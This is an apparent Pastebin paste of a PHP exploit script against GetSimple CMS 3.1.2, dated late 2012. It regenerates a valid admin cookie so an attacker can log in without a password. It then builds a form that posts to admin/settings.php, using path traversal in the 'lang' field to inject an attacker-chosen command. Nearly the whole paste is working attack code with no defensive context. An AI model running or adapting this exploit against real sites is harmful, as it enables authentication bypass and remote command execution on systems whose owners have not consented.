SHARE
TWEET

ihaihac0de-v3

a guest Jan 7th, 2013 162 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.         // --------------------------------
  3.         // iHaiHa-vs-hosting2rce.php   
  4.         // --------------------------------
  5.         // 26.12.2o12
  6.         //
  7.         // Specjal thanks to ihaiha team for
  8.         // 'point of view'.
  9.         //
  10.  
  11.  
  12. // cookie() grepped from GetSimple 3.1.2, THANKS! ;]
  13. // just for 'knowing the cookie'.
  14. function create_cookie() {
  15.         global $USR,$SALT,$cookie_time,$cookie_name;
  16.         $saltUSR = $USR.$SALT;
  17.         $saltCOOKIE = sha1($cookie_name.$SALT);
  18.         setcookie($saltCOOKIE, sha1($saltUSR), time() + $cookie_time,'/');
  19.         setcookie('GS_ADMIN_USERNAME', $USR, time() + $cookie_time,'/');
  20. }
  21.  
  22.  
  23. // get-IT-simple-ihaiha-kod-yeah
  24. function getsimple_cookie(){
  25.  
  26.         // potrzebujemy:
  27.         $authenticated = true;
  28.         $USR = 'admin'; //$_POST['userid']; // admin?
  29.         $ver_no_clean = '3.1.2';
  30.         $SITEURL = '/your/GetSimple_3.1.2/admin/settings.php'; //$_POST['siteurl'];
  31.         $SALT = sha1($SITEURL);
  32.         $cookie_time = '7200';
  33.  
  34.         $site_full_name = 'GetSimple';
  35.         $name_url_clean = strtolower(str_replace(' ','-',$site_full_name));
  36.         $cookie_name = strtolower($name_url_clean) .'_cookie_'. $ver_no_clean;
  37.  
  38.         echo 'It should be interesting that we can (re)generate valid cookie<br>';
  39.         echo 'and login without password, right? <br><br><b>Generated cookie:  ';
  40.         echo $cookie_name . '<br></b>';
  41.         echo '<br>Anyway: this simple code exploits vulnerability in :<br>';
  42.         echo '<b>admin/settings.php</b>:';
  43.  
  44.        
  45.         if( $authenticated ) {
  46.                 # YES - set the login cookie, then redirect user to secure panel
  47. //              create_cookie();
  48.                 setcookie('GS_ADMIN_USERNAME', $USR, time() + 3600,'/');
  49.        
  50.                 echo '<form method="post" action="'. $SITEURL .'">';
  51.                 echo '<input type="hidden" name="username" value="' . $USR . '">';
  52.                 echo '<input type="hidden" name="pwd" value="ihaihaiha">'; // sample; as a hardcoded (wrong anyway) pass
  53.                 echo '<input type="hidden" name="lang" value="en_US/../../../../../../../../../../tmp/&cmd='.$_POST['cmd'].'">';
  54.                 echo '<br>So add come cmd: <br>';
  55.                 echo 'cmd: <input type="text" name="cmd">';
  56.                 echo '<input type="submit" value="teraz">';
  57.         } else {
  58.                 echo 'Nope. :C';
  59.         }
  60.  
  61.  
  62.  
  63. } // end of getsimple_cookie()
  64.  
  65. getsimple_cookie();
RAW Paste Data
Top